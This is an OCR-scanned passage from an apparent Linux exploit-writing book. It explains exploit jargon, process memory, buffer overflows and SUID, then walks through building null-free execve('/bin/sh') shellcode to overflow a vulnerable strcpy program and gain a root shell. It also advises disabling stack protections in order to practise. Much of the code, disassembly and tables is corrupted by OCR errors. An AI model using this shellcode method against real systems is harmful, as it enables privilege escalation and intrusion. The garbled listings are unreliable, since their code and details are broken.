Often, you can hear hackers talking about a zero-day exploit, private exploit, fake exploit, 
PoC, and autorooter or massrooter. Here is what these terms mean: 


O A 0-day exploit is a fresh exploit for errors, for which no patches have been developed and 
no corrected version of the software has been released. Usually, when an exploit for a vul- 
nerability comes out, the developers of the affected software issue a patch or a new version 
of the software with the vulnerability hole closed. This makes the exploit obsolete. At first, 
only a small group of hackers are in the know about zero-day exploits, but with time in- 
formation about them usually becomes public. Zero-day exploits are highly valued (in 
monetary terms, too), which makes them the most sought-after exploits, especially among 
script kiddies. 

QO) Private exploits are, just like the name implies, private knowledge of their creators only. 
Usually, with time either the author makes a private exploit a zero-day exploit or it be- 
comes such by an accidental disclosure. Private exploits are as attractive as zero-day ones 
to script kiddies and others. 

O Fake exploits are programs that imitate exploits but are not actually such a program. Of- 
ten, fake exploits are Trojans masquerading as exploits. After such an “exploit” is 
launched, it installs a backdoor on the victim’s machine and sends an email to its creator 
about this event. Usually, fake exploits are directed against script kiddies, who will reck- 
lessly launch any program. There are whole groups that trade in fake exploits, passing 
them off as zero-day exploits. Because administrators also use exploits to test their sys- 
tems, | would recommend any administrator against obtaining exploits from suspicious 
sources, or advise carefully inspecting the exploit’s code before using it. One way of check- 
ing an exploit is to convert the hexadecimal codes of the shellcode into their character 
equivalents, because fake exploits often contain destructive commands in their shellcodes. 

O The PoC (proof of concept) acronym is often used by security professionals instead of 
the term exploit. Information about discovered vulnerabilities is presented in two types 
of reports: proof of concept theory and proof of concept code. The latter term usually 
denotes the exploit. 

© Autorooter is a complex of a one or more exploits and other hacker utilities, such as a port 
scanner or a security scanner. An autorooter may be implemented as a single file or as 
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multiple interlinked files. Autorooters are created by smart but lazy hackers to make the 
task of breaking into servers easier. An autorooter scans a network for vulnerable ma- 
chines, compromises those found, and then informs its master about this. In other words, 
an autorooter performs a mass automatic break-in over a network. Therefore, they are 
also called miassrooters. A massrooter’s operation is analogous to that of Internet worms 
except that they are controlled by the hacker. At the time the material for this book was 
researched, few autorooters were available, but undoubtedly this state of affairs will not 
last. Autorooters that can be found in public Internet archives include massrooterfinal by 
Daddy_cad, lpd_autorooter by dave, and OpenSSL-uzi by Harden. The immense cracking 
power made available by autorooters makes them particularly dangerous in the hands of 
script kiddies, who never really cared about how cracking tools worked and can only 
point, click, and crack. 


The subject of programming autorooters is not covered in this book; however, the book 
gives sufficient information on its separate components to make it possible for you to com- 
bine them into an autorooter of your own. 


12.2. Structure of Process Memory 


To be able to develop exploits, you must know the particularities of the operating system the 
exploit is aimed at. Because only Linux exploits are considered in this book, review some spe- 
cifics of this operating system. 

A program stored on the disk is different from its image loaded into the memory. A pro- 
gram being executed in the memory ts called a process. A process can operate in two modes: 
kernel mode and user mode. In the user mode, a process executes instructions allowed at the 
unprivileged processor security level. When a process requires some kernel services, it makes a 
system call, which executes kernel instructions on the privileged processor security level. In 
this way, the kernel protects its address space from access by application processes, which may 
destruct the integrity of the kernel data structure and crash the operating system. Accordingly, 
an image of a process consists of two parts: the kernel mode and the user mode. 

A process image in the user mode consists of separate segments: code, data, stack, shared 
libraries, and other structures that it can directly access. A process image in the kernel mode 
consists of data structures that cannot be accessed by the process in the user mode: process 
control structures, memory mapping tables, and others. 

Each process is allocated 4 GB of virtual address space. The upper 1 GB of the virtual 
memory is allocated to the system kernel, and the lower 3 GB are allocated to the user mode 
process. In Linux systems, the virtual address space of user mode process starts at 0xc0000000 
(Fig. 12.1). 

The order of the user mode process segments depends on the format of the executable file. 
In Linux, the main format of executable files is ELF (see Chapter 15). Although there are other 
formats (e.g., the common object file format), only ELF is considered in this book. Figure 12.2 
shows the location of the main segments of a process loaded from an ELF file. 
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Fig. 12.1. The kernel mode and the user mode of the process virtual address space 
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Fig. 12.2. The user-mode virtual memory of a process 
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Segments are loaded into the virtual memory starting at address 0xc0000000 in the 


following order: 


l. 


External variables such as environment variable strings (the program’s name and path, the 
home directory, the mailbox name, the terminal name, etc.), command-line arguments 
(argv), environmental variable pointers (env pointers), command line pointers (argv 
pointers), and the argc parameter 

The stack segment, which is used to temporarily store variables 

The heap segment, which is used by the application to allocate the amount of memory 
needed and to manage its size, that is, to perform dynamic memory allocation 

The .bss segment, which contains uninitialized data 

The .data segment, which contain initialized data 

The .text segment, also called the code segment, which contains the program’s instruc- 
tions; this segment is read only 

The shared libraries segment 


An exploit developer must have a precise idea, into which memory segments the variables 


declared and defined in the program are placed. This also depends on the type of the variable. 
C has the following variable types: 


0 
0 
Oo 


Global variables, whose scope extends over the entire program. 

Local variables, whose scope is limited to the function, in which they are defined. 
Automatic variables, which are local variables that exist only as long as the procedure, in 
which they are declared, is running. When the procedure terminates, the values of the 
procedure’s local variables are not preserved, and the memory allocated to those variables 
is released. 

Static variables, which are declared using the static keyword before the regular declara- 
tion. Both local and global variables can be declared as static. Unlike automatic variables, 
local static variables exist the entire time the program is running. The scope of static global 
variables is limited to the end of the file. 

Pointers, special variables that store memory addresses, at which the actual data are 
stored. The x86 architecture employs a 32-bit addressing system; therefore, a pointer is 
always a 32-bit integer memory address. 


All global and static variables are located in the .data segment if initialized and in the 


.bss segment if uninitialized. 


Automatic variables are stored on the stack. 
When a pointer is declared, it is stored in the .bss segment or on the stack, and its value is 


undetermined. When a process allocates memory in the heap (e.g., using the malloc () 
function), the address of the first byte of this memory space (also a 32-bit number) is placed 
into the pointer. 


The program shown in Listing 12.1 demonstrates storing variables in the memory. 
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Listing 12.1. Storing variable in the memory 











#include <stdio.h> 
#include <stdlib.h> 


int var; // In BSS 

char *str; // In BSS 

int x = 111; // In data 

static int y = 222; // In data 

char bufferl[666); // A buffer in BSS 
char mesl[] = “abcdef"; // In data 


void f(int a, char *b) // In the stack 
{ 
char p; // In the stack 
int num = 333; // In the stack 
static int count = 444; // In data 
char buftfer2(777); // A buffer in the stack 
char mes2[] = "zyxwvu"; // In the stack 


str = malloc(1000*sizeof(char)); // A buffer in the heap 

strnepy(str, "abcde", 5); // Entering data in a buffer in the heap 
strncpy(bufferl, "Sklyaroff", 9); // Entering data in a buffer in BSS 
strncpy(buffer2, "Ivan", 4); // Entering data in a buffer in the stack 


int main() 
{ 
Fil, “string"); 


return 0; 





The program is loaded in GDB as follows: 
# gcc sections.c -o sections -g 

# gdb sections 

(gdb) list 

18 

19 str = malloc(1000*sizeof (char) ); 
20 strncpy({str, "abcde", 5); 

21 strncpy(bufferl, "“Sklyaroff", 9); 
22 Strncpy(buffer2, “Ivan", 4); 

23 ) 

24 

22 int main() 

26 | 

2f E(i, "stzving™}; 


The following sets a breakpoint at the end of the £() function and runs the program: 


(qdb) break 23 
Breakpoint 1 at Ox80485lc: file sections.c, line 23. 


Chapter 12: General Information 183 


(gdb) run 
Starting program: sections 


Now, you can inspect how the variables are stored in the memory: 

{qdb) info symbol évar 

Var in section .bss 

(gdb) info symbol éstr 

str in section .bss 

(qdb) info symbol &x 

x in section .data 

(qdb) info symbol &x 

x in section .data 

(qdb) info symbol &y 

¥ in section .data 

(gap) anfo symbol &bufferl 

bufferl in section .bss 
db) anfo symbol émesl 

1 in section .data 

(qdb) info symbol &count 

count.0 in section .data 


The a, b, p, and num local variables and the buffer2 and mes2 buffers are stored on the stack. 


12.3. Concept of Buffer and Buffer Overflow 


A buffer is memory allocated for temporary data storage. Different devices, for example, 
printers or hard drives, can be equipped with a buffer to speed up their operation. In this 
book, only programmatic buffers are considered. In C programs, buffers can be defined in 
three memory segments: the stack, BSS, and heap. All three buffer types were defined in the 
program in Listing 12.1. A buffer is a certain number of bytes reserved in memory; for exam- 
ple, in the program shown in Listing 12.1, 666 bytes are reserved in BSS, 777 bytes in the stack, 
and 1,000 bytes in the heap. If a program does not perform any checks on the amount of in- 
formation written to a buffer, more bytes can be written to the buffer than the actual amount 
of memory allocated. This usually causes program errors of different seriousness. More in- 
formation written to a buffer than the amount of memory allocated to it is called a buffer 
overflow error or simply buffer overflow. In the computer security milieu, this is often con- 
tracted to even shorter BoF. 

Buffer overflow can be used to gain control over the machine that experienced it. It is the 
most common and the most dangerous error in C programs, and most exploits are based on 
it. Using buffer overflow has its specifics, depending on the memory segment, in which it took 
place (i.e., the stack, BSS, or heap). This necessitates different approaches when developing an 
exploit. That is, an exploit taking advantage of a stack buffer overflow will be different from an 
exploit taking advantage of a heap buffer overflow, which will be different from a BSS buffer 
overflow. The specifics of exploits that take advantage of each of these buffer overflow types 
are considered in this book, 
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12.4. SUID Bit 


Because a shellcode executes in the memory space of a vulnerable process, it acquires all the 
privileges of this process. Thus, if a vulnerable program is run with root privileges, when an 
exploit is applied to such a program and the exploit’s shellcode successfully executes, a shell 
can be opened that will also have root privileges. 

As a result, crackers are especially interested in vulnerable programs with the SUID bit set. 
As you remember, the SUID bit allows any users executing a file to run that file as if they were 
the file’s owner. The SUID bit is set by the chmod utility. The set group identifier (SGID) bit 
works the same as the SUID bit except that the file is run with its group set to the group of the 
file, rather than the group of the user who started it. 

Many functions require root privileges for their operation, for example, the socket () 
function, used for creating raw sockets. So it’s no surprise that many vulnerable programs 
have their SUID bit set, which gives them temporary root privileges. Exploits that open a shell 
with root privileges are especially valued by crackers. 


12.5. AT&T Syntax 


To create shellcodes, you must know assembly language, and not just any assembly language 
but one using the AT&T syntax. Linux’s standard assembler utility, as, uses the AT&T syntax; 
however, the utility a shellcode developer needs is not this assembler but the GDB disassem- 
bler, which outputs assembly instructions using AT&T syntax. If you learned assembly 
programming under Windows (using TASM, MASM, or NASM), you already know the Intel 
syntax. This syntax is not significantly different from the AT&T syntax, so you will have 
no problems figuring out the latter. Table 12.1 lists the main differences between these two 
syntaxes, along with code examples. 


Table 12.1. Comparing the two assembler syntaxes 








AT&T syntax 


No prefixes are used in register labels: eax, ebx, Registers are always denoted prefixed with the 
@Cx, ... percent sign: eax, tabx, $ecx, ... 


| Immediate operands are not prefixed with any | Immediate operands are prefixed with the dollar 
special characters: sign: 
push 1 | push $l 
sub esp, 50h sub $0x50, %esp 


In instructions with multiple operands, the In instructions with multiple operands, the source is 
destination is specified first and the source last: | specified first and the destination last: 

moy eax,1 movb $1, teax 

imul eax, edx,13 | imil $13, tedx, teax 


continues 
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Table 12.1 Continued 


Operand size is indicated using a directive: Operand size is indicated using suffixes to 
instructions: 

byte ptr—byle(mov byte ptr variable, 1) 

word ptr — word (mov word ptr variable, b—hbyte (movb $1, variable) 

100) w—word (movw $3100, variable) 

dword ptr — double word (push dword ptr 1 — double word (pushl variable) 

Variable) 

The base register is specified in square brackets: The base register is specified in parentheses: 
lea edi, [ebp + variable] ‘| lea Oxf ffftffcz(tebp), sedi 


| Indirect addressing has the following format: | Indirect addressing has the following format: 
segreg: [base + index*scale + disp] $5egreg:disp(base, index, scale) 
mov eax, base addr[ebx + edi*4) | movl base addr(tebx, tedi,4), %eax 





12.6. Exploit Countermeasures 


Numerous defenses have been developed against buffer overflow and format string error 
vulnerabilities. For example, such systems as StackGuard, StackShield, ProPolice, Openwall 
(OWL), and Libsafe protect against stack buffer overflow. The PointGuard utility protects 
against overwriting function pointers in the .bss segment. The FormatGuard utility pro- 
tects against format string vulnerabilities. The Heap protection utility protects against heap 
buffer overflow. 

No methods for circumventing these defenses are considered in the book because each 
requires an individual approach; moreover, the hacker community has not found ways of 
circumventing many of them yet. Practically all modern Linux distributions install one or 
another type of defense by default. Therefore, many examples described in this part, includ- 
ing the exploits, may not work on your system. To be able to practice your exploit-writing 
skills, you should either remove all defenses from your installation or install a Linux distri- 
bution without defenses, Older Linux versions can be used for the latter approach. For exam- 
ple, my Red Hat 7.1 has no defenses, and all examples considered in this book run under it 
with no problems. 
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13.1. Stack Buffer Overflow 


The stack buffer overflow vulnerability was first used in the ill-famed Morris worm in 1988. 
But the real boom of exploits based on the stack buffer overflow error started after the re- 
nowned “Smashing the Stack for Fun and Profit’ article by Aleph One in the Phrack magazine 
(Issue #49, Article #14). The material presented in this section is in many aspects based on that 
article. 


13.1.1. Stack Frames 


To understand the stack overflow mechanism, you must understand the operation mecha- 
nism of the stack itself. 

The stack operates on the last in, first out (LIFO) principle; that is, the last value placed 
onto the stack is the first one taken off it. The operation of placing a value onto the stack is 
called pushing, the one of taking a value off the stack is called popping. Accordingly, the as- 
sembler instructions that perform these operations are called push and pop. 

The stack grows from the higher memory addresses toward the lower ones (Fig. 12.2). 
The address of the top of the stack is stored in the ESP register and constantly changes as val- 
ues are pushed onto and popped off the stack. When a function is called, a group of data, 
called the stack frame, are pushed onto the stack. The data in the current stack frame are ac- 
cessed using the EBP register. A stack frame contains the arguments passed to the function, 
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its local variables, and two pointers for returning to the state preceding the function call: the 

stack frame pointer (SFP) and the return address. The srp is needed to restore the previous 

value of the EBP register, and the return address is need to restore in the EIP register the ad- 

dress of the command that must be executed following the function call. As you should re- 

member, the address of the next instruction to execute is always stored in the EIP register. 
Formation of a stack frame is demonstrated in Listing 13.1. 





Listing 13.1. Forming a stack frame 





void test_func(int A, int B, int C, int D) 
i 
char Foo; 
int boo; 
char buffer[100]; 
} 
int main() 
j 
test _func(10, 20, 30, 40); 
} 





When the test _func() is called, a stack frame is formed in the stack as shown in Fig. 13.1. 
First the function arguments are pushed onto the stack (in this order: 40, 30, 20, 10), then the 
return address, then the current EBP value (the SFP), and finally the function’s local variables 
(foo, boo, buffer). The function’s arguments will be referenced by decrementing the EBP reg- 
ister, and the local variables will be referenced by incrementing it. 


High addresses (stack bottom) 


A 


Stack frame pointer 


Low addresses (stack top) 





Fig. 13.1. A stack frame 
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When the program is started, the stack contains only one frame, for the main() function. 
It is called the starting or external frame. A new frame is created every time a function is called. 
When a function is exited, the frame for its call is destroyed. Recursive function calls are han- 
dled like regular function calls, with a frame for each recursive call pushed onto the stack. 


13.1.2. Vulnerable Program Example 


Consider an example of a vulnerable program (Listing 13.2). 


Listing 13.2. A vulnerable program (stack_vuln.c) 





#include <stdio.h> 
#include <string.h> 


int main{int arge, char *argv[)]) 


char buf[100]; 


uf (arge > 1) { 
strepy (buf, argv[1]) 
printf ("OK! \n"); 
} else 
printf ("Please, enter the argument! \n"); 


return 0; 


In this program, the strcpy() function does not check the size of the received data, which 
makes it possible to pass a string of any length to this function, for example: 

# gcc stack _vuln.c -o stack vuln 

# ./stack vuln ‘perl -e "print "A"x150'" 

Using the perl language with the -e option, which allows instructions to be executed in 
the command line, 100 a characters were passed to the program. 

Functions that do not check the size of the data passed to them are common in C lan- 
guage; the functions streat(), sprintf(), vsprintf(), and gets() are examples of these. 
Usually, different secure-programming guides recommend replacing these functions with 
their relatives that do check the size of the data they are passed. For the just-named functions 
the safe replacements are strncat (), snprintf(), vsnprintf(),and fgets(). But you should 
not assume that functions that check the size of the data they are passed are secure in all situa- 
tions. For example, replace the strcpy() function in the vulnerable program in Listing 13.2 
with the strncpy () function: 

strnepy (buf, argv[1], strlen(argv[1])); // Wrong 


The preceding example leaves the program vulnerable even though the strnepy() func- 
tion checks the size of the data passed to it. In other words, even functions considered secure 
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can become insecure if used incorrectly. The right way of using the strncpy() function is the 
following: 

strncpy (buf, arqv[{l1], sizeof(buf)); // Right 

Using the function in this way will not let more than 100 bytes to be written to the buffer, 
making the program secure. 

Thus, your task is to write a shellcode exploit that will overflow the buffer and overwrite 
the return address to pass control to the shellcode, which in turn launches a system shell with 
the root privileges (uid=0 (root) gid=0(root) ). 

I show you first how to write the shellcode and then how to put together an exploit using it. 

The source codes for all programs in this section can be found in the /PART III/ 
Chapter 13/13.1 directory on the accompanying CD-ROM. 


13.1.3. Creating the Shellcode 
The C source code for the program to launch a system shell is shown in Listing 13.3. 


Listing 13.3. Shellcode launcher (shellcode.c) 





finclude <stdio.h> 
finclude <unistd.h> 


int main() 
| 
char *shell [2]; 
shell(O) = "/bin/sh"; 
shell[1) = BULL; 
execve (shell[0], shell, NULL); 


exit (a); 
} 
The execve() function was selected for starting a shellcode because — unlike other 
functions of the exec() family — it is a true system call, which will make disassembling 


the code easier. 

The program ends by calling the exit () function. If the call of execve() function is un- 
successful, the program will continue executing in the stack, meaning that arbitrary data fol- 
lowing it will be fetched as instructions. This development will certainly result in an abnormal 
termination of the program. The exit () function was used to ensure correct termination 
of the program in case of an unsuccessful execve () function call. 

Compile the shellcode.c file using the -g debugging option and, to include in the program 
the shared library functions, add the -static switch: 

# gcc shellcode.c -o shellcode -g --static 


Load the compiled program in the GDB disassembler: 
@# gdb -q ./shellcode 
First, disassemble the main() function (Listing 13.4). 
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Listing 13.4. The disassembled main() function 





(gdb) disassemble main 
Dump of assembler code for function main: 


OxB0481e0 <main>: push %ebp 

OxB048lel <main + 1>:; mov tesp, tebp 

OxBO048les <main + 3>; sub 20x88, %esp 

Ox80481le6 <main + 6>: movl  $0x808e2c8, Oxfffffffts (tebp) 
OxB048led <main + 13>: mow] SOx0, Oxfffffffc (tebp) 
Ox80481f4 <main + 20>: sub $0x4, %tesp 

OxBO0481f7 <main + 23>: push $0x0 

OxBO0481f9 <main + 25>: lea OxfffffEES (tebp), *teax 
OxB0481lfc <main + 26>: push eax 

OxB0481fd <main + 29>: pushl Oxfftftirrts (sebp) 
Ox8048200 <main + 32>: call Ox804dcbf0 <_ execve> 
O*x8048205 <main + 37>: add 50x10, tesp 

OxBO048208 <main + 40>; sub SOxc, %esp 

Ox804820b <main + 43>: push $0x0 

OxB804820d <main + 45>: call OxB0484be <exit> 


End of assembler dump. 
(gdb) 





The functions of interest are called at the 0x8048200 and 0x804820d addresses (the corre- 
sponding lines are set off in bold). 
Now, disassemble the execve () and exit () functions (Listings 13.5 and 13.6). 





Listing 13.5. The disassembled execve() function 





(qdb) disassemble execve 
Dump of assembler code for function main: 


OxB04cbfi0 <_ execve>: push ‘ebp 

Ox804cbfl <_ execve + 1>: mov 20x0, %eax 

Ox804cbf6 <  execve + 6>: mov ‘esp, %ebp 

Ox804cbf8 < execve + 68>: test eax, *teax 

Oxs04cbfa < execve + 10>: push edi 

OxBO4cbfib < execve + 11>; push #ebx 

Oxd04cbfic <_ execve + 12>: mov Ox8(tebp), sedi 

Ox804cbff <_ execve + 15>: je Ox804ec06 <_ execve + 22> 
Ox804ec01l <_ execve + 17>; call 0x0 


; A pointer to the argument array is stored in *tecx. 

; The shelleode's first argument is set to the address of the /bin/sh 
; string, and the second is set to NULL. 

OxBO4dec06 <_ execve + 22>: mov Oxc(tebp), %ecx 


; A pointer to the array of the program environment variables is stored 
; in tedx. In the shellcode, it is set to NULL. 

Ox804cc09 <_ execve + 25>: mov OxlO($ebp), tedx 

Ox804decOc <_ execve + 28>: push tebx 


7; A pointer to the launch string - /bin/sh - i8 stored in tebx. 
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Ox@O0decOd <__execve + 29>: Mov ‘edi, tebx 


; The number of the system call is stored in %eax. 
Ox804ccOf£ <__execve + 31>: mov °Oxb, teax 


; Calling interrupt 0xs0. 


Ox80dccl4 <__execve + 36>: int $0x80 

Ox804ccl6 <_ execve + 38>: pop $ebx 

Oxe04ecl7 < execve + 39>; mov #eax, tebx 

Ox804ecl9 <__execve + 41>: cmp eOxffffCO00, tebx 
Ox804eclf <__execve + 47>: jbe OxBO04ec2f <_ execve + 63> 
OxB04dec21 <__execve + 49>: neg tebx 

Ox804cc23 <_ execve + 51>: call Ox80484b0 <_ errno location> 
Ox804dec28 <_ execve + 56>: mov tebx, (*%eax) 

Ox80decza <_ execve + 58>: mov SOxffCfCfrfre, tebx 
Ox804cc2f <_ execve + 63>: mov tebx, teax 

Ox804cec31 <__execve + 65>: pop t%ebx 

Ox80dcc32 <__execve + 66>; pop tedi 

Ox804cc33 <_ execve + 67>; pop ‘ebp 

Ox80dec34 <_ execve + 68>: ret 


End of assembler dump. 
(gdb) 





Listing 13.6. The disassembled exit() function 





(gdb) disassemble exit 

Dump of assembler code for function exit: 
Ox804B4bc <exit>: push %ebp 

Ox804Bb4bd <exit 1>: mow %esp, tebp 
Oxé0464bf <exit a>! push $eES1 

Ox80484c0 <exit 4>: push $ebx 

Ox80464el <exit 5: mov Ox6B09edbO, tedx 
OxeB0464c7 <exit 1ll>: test fedx, %edx 
OxB04684e9 <exit 13>: mov OxS(tebp), tesi 
Oxb0484ee <exit 16>; je OxB804853a <exit + 126> 
Ox804db4dce <exit 18>: mov *esi, %e@51 
OxBO0464d0 <exit 20>: mov Ox4d (ede), tebx 


Ox80464d3 <exit Pe Pe test tebx, tebx 

Ox80464d5 <exit mov tedx, %ecx 

Ox604B4d7 <exit ea aL: 0x8048518 <exit + 92> 
OxB0484d9 <exit 29>: lea OxO(%esi), *esi 
OxbO0484de <exit 32>! mov Ox4d ($ecx), eax 
OxB0484df <exit 35>: dec tean 

Ox80484e0 <exit 36>: mov $ean, Ox4d(*%ecx) 
Ox80464e3 <exit 39>: shl S0x4, teax 

Ox80464e6 <exit 42>: lea (seax, *tecx, 1), eax 
Ox80484e9 <exit 45>: lea Ox8 (eax), tedx 
Ox804B4ec <exit 49>: mov Ox6 (feax), eax 
OxB0484ef <exit 51>: cmp SOx4, teax 

Ox80484f2 <exit 54>: ja 0x8048509 <exit + 77> 


ee 
haa 
in 
v 


Ox80484f4 <exit + 56>: jmp *Ox808e2e0(, teax, 4) 
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Ox80484fb <exit 
Ox80484fe <exit 
Ox60484ff <exit 
Ox8048502 <exit 
Ox8048503 <exit 
OxB048506 exit 


63>; nop 

64>: sub $0x8, %esp 
67>: pushl 0x8 (%edx) 
TO>: push #esi 

71>: call *Ox4 (¢edx) 
V4>; add $0x10, %esp 


OxBO048509 <exit TTS! mov OxBO09cdb0, tedx 
Oxe04850f <exit + 83>: mow Ox4d (edu), eax 
O“BO48512 <exit Bo>: test teax, eax 

OxBO48514 <exit 88>: mov kedx, tecx 

OxB048516 <exit 90>: jne OxBO4b4dc <exit + 32> 
OxBO4S518 <exit Q2>: mov (tedx), téax 

OxB80485la <exit 94>: test ‘eax, teax 

OxBO485le <exit GB>: mov ‘eax, Ox809cdb0 
OxBO048521 <exit 101>: je OxB04852f <exit + 115> 


Ox8048523 <exit 
Ox8048526 <exit 
OxB048527 <exit 
OxB04852c <exit 
OxBO04852f <exit 
Ox8048534 <exit 
Ox8048536 <exit 
Ox8046538 <exit 
OxBO04653a <exit 
OxG04b53f <exit 
OxMBO46545 <exit 
OxBO048547 <exit 
Ox8048548 <exit 
OxB04854a <exit 
OxB04854d <exit 
Ox8048553 <exit 
OxB048555 <exit 
OxG048558 <exit 
Ox804855b <exit 
Ox804855c <exit 
Ox804855d <exit 
OxB04855e <exit 
Ox8048563 <exit 
Ox8048564 <exit 
Ox€048567 <exit 
Ox8048569 <exit 
Oxb04856c <exit 
OxB04856f <exit 


103>: sub SO0xc, esp 

106>: push tedx 

107>:; call Ox604clf4 <__libc_free> 
112>: add, S0x10, %tesp 

Ligier: mov OxS09cdbO, teax 

120>: mov teax, *edx 

l22>: test $edx, tedx 

1242; jne Ox80464d0 <exit + 20> 
126>: mov 2Ox809bd84, Sebx 

131>: omp SOx809bd88, %ebx 

13T>: jae Ox8046555 <exit + 153> 
139>: nop 

140>: call * (%ebx) 

142>: add 50x4, %tebx 

145>: cmp SOx809bd98, tebx 

1§i>:. jb Ox8048548 <exit + 140> 
153>: mov %esl, Ox ($ebp) 

156>: lea Oxfftftirfs (tebp), tesp 
159>: ‘pop $ebx 

160>;: pop esi 

161>; pop Sebp 

162>: jmp Ox804cbd0 < exit> 
l67>: nop 

168>: call *0x4(%edx) 

171>: jmp 0x8048509 <exit + 77> 
Lis: léa OxO(%esi), %es1 

176>: sub S0x8, %esp 

179>: push ‘esi 

OxB048570 <exit + 180>: pushl Ox8 (%edx) 

OxB048573 <exit + 183>: jmp Ox68048503 <exit + 71> 
End of assembler dump. 

(gdip) 


i i ee 





You can see that a jump to the system call exit is made at address 0x804855e; conse- 
quently, the exit () function is only a wrapper for this system call. So, disassemble the exit 
function (Listing 13.7). 
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= 





Listing 13.7. The disassembled _ exit function 





(gdb) disassemble exit 
Dump of assembler code for function exit: 
OxB04dcbd0 <_exit>: mov 'ebx, %edx 


OxB04cbd2 < exit 
Ox804dcbhd6 <_exit 


OxB04cbdd < exit 
Ox@04cbhdf < exit 


2m mov Qx4d (tesp, 1), tebx 
6>: mov SOxl, %*eax 


13>: mov tedx, *tebx 
15>: emp SOxftftffEOO1, teax 


+ 
of 
Ox804dchdb <_exit + 11>: int S0xB0 
As 
+ 
+ 


Ox804cbe4 < exit 


20>: jae 0x8054260 <_ syscall error> 


End of assembler dump. 


(gab) 





In Linux, kernel calls are made at interrupt 0x80 (int $0x80), with the number of the sys- 
tem call stored in the $eax register (e.g., mov $0x1, %eax) and the call’s arguments, if any, 
stored in the tebx, ecx, and %edx registers. Each system call has a unique number; for exam- 
ple, 0x1 for exit and Oxb for _execve (see Listings 13.6 and 13.7). The numbers of other 
Linux system calls are stored in the /usr/include/asm/unistd.h file (see Listing 13.8). 





Listing 13.8. The numbers of the first 30 Linux system calls 





#i fndef 
ecefine 


/*. This 


#define 
#define 
tide fine 
#define 
#dertine 
#define 
#define 
scefine 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
edefine 
#define 
#define 
#define 
adefine 


_ASM 1386 UNISTD H_ 

_ASM I386 UNISTD_H_ 

file contains the system call numbers. */ 
__NR exit 1 
__NR fork 2 
_ NR: read 3 
__NR_write 4 
__NR_open 2 
__NR_close 5 
__NR_ waitpid q 
__NR_ creat B 
_ NR link z 
__NR unlink 10 
__NR execve ll 
__NR chdir 12 
__NR time 13 
__NR_mknod 14 
__NR_ chmod 15 
__NR_ichown 16 
__NR_break 17 
__NR_oldstat 18 
__NR_lseek 19 
__NR getpid 20 
__NR mount 2] 
__NR_umount oe 
__NR_ setuid 23 
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#define NR getuid 24 
#define NR stime 25 
#define NR ptrace 26 
#define NR alarm 2] 
#define NR oldfstat 28 
#define NR pause 29 
tdefine NR utime 30 





The execve() function uses numerous parameters, which, as already mentioned, are 
stored in the ebx, $ecx, and %edx registers. The prototype of execv () (it can be found in man 
execve) looks as follows: 


int execve (const char *filename, char *const argv [], char “const envp[]); 


Thus, the ebx register contains a pointer to the name of the launched file filename 
(in this case, it is /bin/sh). The %ecx register saves a pointer to a string array, the arav[) 
arguments (in this case, argv[0] = "/bin/sh" and argv(1] = NULL). The tedx register saves a 
pointer to an array of key = value strings, which represent the program’s environment. 
To keep things simple, it is set to NULL in the shellcode. My comments to Listing 13.5 give 
details about the values stored in different registers. 

The exit () call has no arguments; of interest here are only two instructions: 

mov S0x1, %eax 

int 0x80 

You cannot know in advance, at which address the shellcode will be located after it is 
passed to the vulnerable application. So how do you reference the data inside the shellcode? 
This problem is solved using the following trick: When a call instruction is executed, the 
return address is saved to the stack directly after the address of the call instruction. So if the 
‘bin/sh file name is saved after the call instruction, when the latter is executed you will be 
able to pop the address of the string off the stack. Listing 13.9 shows how this can be done. 





Listing 13.9. Obtaining the address of the /bin/sh file name 





jm line 
address: 
popl tesi 


(Shellcode) 
line: 

call address 
/bin/sh 








In this way, the address of /bin/sh is saved in the sesi register. This is enough to create an 
array whose first element is taken from %esi + 8 (the length of the /bin/sh\0 string) and the 
second — NULL (32 bits) — from ¢esi + 12. This is done as follows: 

popl tesi 

movl $esi, Oxs(%tes1) 

movil $0x00, Oxc(#esi) 
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But here you will run into a problem. You will pass the shellcode to the strepy function, 
which processes a string until it encounters a NULL character. The shellcode, therefore, must 
contain no zeros. You can get rid of zeros in the movl $0x00, Oxe (Sesi) instruction by re- 
placing it with the following two instructions: 

xOrl teax, ‘teax 

movl teax, S0x0c(%esi) 

Zeros in the shellcode, however, can only be detected after converting it into hexadecimal 
format. For example, take the following instruction: 

Ox804cbd6 < exit + 6>: mov 7Ox1, teax 

In the hexadecimal notation, it looks like following: 

b8 O01 00 00 00 TOV S$0x1, *eax 

To get rid of all the zeros, various tricks are used, such as initializing with zeros and then 
incrementing by one, as in the following code fragment: 

xorl tebx, tebx ; tebx = 0 

movl tebx, eax ; teax = 0 

inc %eax ; teax = 1 

If you recall, the /bin/sh\0 string in the shellcode ends with a 0 byte. Replace this 0 byte 
with the following instruction: 

/* movb works only with 1 byte. */ 

movb teax, Ox07(%esi) 


Now, you can write a preliminary version of the shellcode (Listing 13.10). 





Listing 13.10. The preliminary shellcode 





/* shellcode?.c */ 


int main({) 
{ 
asm("jmp line 


address: 
popl esi 
movl tesi, Ox8(tesi)} 
xOrl teax, teax 
movl teax, Oxc(%esi) 
movb teax, Ox? (%es1) 
movb S0xb, tal 
movl tesi, ‘tebx 
leal OxB(%esi), *tecx 
leal Oxc(#esi), tedx 
int $0x80 


xorl §ebx, tebx 
movl Sebx, *eax 
inc %éax 
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int $0x80 


line: 
call address 
«String \"/bin/sh\" 
™}; 





Compile the source code using the following command: 

*# gec shellcode?.c -o shellcode? 

Then examine its hexadecimal dump for the presence of 0 bytes using the objdump utility: 
# objdump -D ./shellcode2 

Listing 13.11 shows the part of the code of interest here. 





Listing 13.11. The hexadecimal values of the shellcode 





O8048430 <main>: 


BO48430; 55 push ‘%ebp 
BO48431: B9 e5 mov tesp, ‘tebp 
BO46433: eb 1f mp a048454 <line> 


08048435 <address>: 


BO48435: oe pop FESL 

8048436: B89 Te 08 mow $esi, Ox8 (%esi) 
8048439: 31 ¢€0 xOr ‘eax, eax 
BO4843b: 89 46 0c mov $eax, Oxc (esi) 
AO04843e: 88 46 O07 mow tal, Ox? (%esi)} 
BO48441: bO Ob mov SOxb, tal 
8046443: 89 £3 mov esi, *tebx 
8048445: Bd de O08 lea Ox8 (%esi), %ecx 
8048446; 8d 56 Oc lea Oxc(#esi), tedx 
B04844b: ed 80 int 50x80 

BO04844d: 31 db XOr tebx, *tebx 
H#O04844F: B9 dé mov tebu, tear 
SO48451: 40 inc beax 

8048452: ed 80 int 50x80 


08048454 <line>: 


6046454: es dc ff ff ff call BO048435 <address> 

8048459: Zt das 

